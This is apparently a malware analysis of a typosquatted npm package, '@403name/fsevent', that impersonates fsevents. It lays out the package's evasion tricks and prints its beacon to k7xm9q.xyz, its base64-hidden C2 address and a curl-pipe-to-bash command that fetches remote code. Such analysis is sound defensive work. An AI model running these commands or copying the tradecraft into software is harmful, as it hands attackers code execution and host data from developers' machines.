On require(), index.js runs an IIFE that gates to macOS, skips when CI or GITHUB_ACTIONS is set, waits 30-90 seconds, and writes a one-shot marker at ~/.cache/.nyx-npm/f. It then spawns /bin/sh to (1) GET https://k7xm9q.xyz/api/clickfix-callback with URL-encoded query parameters bid, user (process.env.USER), host (os.hostname()), and the literal tag npm_fsevent — a beacon identifying the infected machine — and (2) execute curl -sSfL https://k7xm9q.xyz/api/payload/ | /bin/bash & disown, fetching and shell-executing attacker-controlled code with the developer's privileges. The C2 host is hidden behind atob('aHR0cHM6Ly9rN3htOXEueHl6') to evade keyword scanning. The package name @403name/fsevent and its description ("Native filesystem event watcher for Node.js — lightweight FSEvents wrapper with fallback polling") impersonate the well-known fsevents package to lure developers into installing and importing it. The combination of obfuscated C2, CI evasion, randomized delay, one-shot persistence marker, host-identifier exfiltration, and pipe-to-bash remote execution is unambiguous malicious tradecraft.